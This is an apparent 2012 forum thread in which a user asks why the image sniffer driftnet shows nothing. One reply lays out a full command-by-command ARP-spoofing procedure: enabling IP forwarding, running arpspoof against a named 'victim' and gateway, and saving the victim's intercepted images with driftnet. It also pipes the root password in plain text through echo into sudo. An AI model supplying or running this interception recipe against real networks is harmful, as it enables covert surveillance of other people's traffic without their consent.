problem with drifnet

Started by berghem, July 24, 2012, 07:59:10 AM

Previous topic - Next topic


hi all
  i tried use drifnet tool, but I have some problems...
i wrote this command in shell
sudo drifnet -i wlan0
after I open firefox and i loaded some pages with picture, but drifnet windows was empty

Can you help me?


Are you trying to sniff the traffic of your computer or other host? If you want to sniff packets from another host connected to your network you must first start an arp spoofing session with ettercap or arpspoof


I only tried with my host. I haven't other host in this moment....


it's strange, it works for me... I don't know, wait for the replies of the other users


we have noticed nothing unusual on this app, so there might be some of your custom setting over your system.
will suggest to reinstall your app and remove anything related in your home dir.


Sill question are you using arpspoof ??

please post your full method as sudo driftnet -i wlan0 will just not cut the mustard  you have left out steps of this procedure

1 ) sudo { remove from commands below if your using root }
2 ) echo "password" | sudo -S { remove from commands below if your using root }

sudo mkdir /tmp/driftnet
sudo mkdir $HOME/driftnet
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t target gateway
sudo driftnet  -a -i wlan0 -d /tmp/driftnet

replace target with the victims ipand gateway with your gateway

to get your gateway type

ip route show default | awk '/default/ {print $3 }'

echo "password" | sudo -S find /tmp/driftnet -type f -name "*.*" -exec mv {} $HOME/driftnet \;

replace password with the password you have setup for root

then close driftnet , disbale ipfoward and stop arpspoof

sudo pkill driftnet
echo 0 | sudo tee /proc/sys/net/ipv4/ip_forward
sudo pkill arpspoof

and the pictures will be in a driftnet folder in your user folder

if you want to remove some junk files like gifs and pngs depending on the items you want to keep then do

echo "password" | sudo -S find $HOME/driftnet -type f -name "*.gif*" -exec rm {}  \;
echo "password" | sudo -S find $HOME/driftnet -type f -name "*.png*" -exec rm {}  \;

replace password with the password you have setup for root



Hi berghem, if can be useful for you, when i use driftnet i put -a option that save images in tmp/ folder otherwise i see only a blck screen, then i open images with xdg-open, so the command result something like:
driftnet -a -v -i wlan0
you can try it with some vm...
una voce libera รจ sempre liberatrice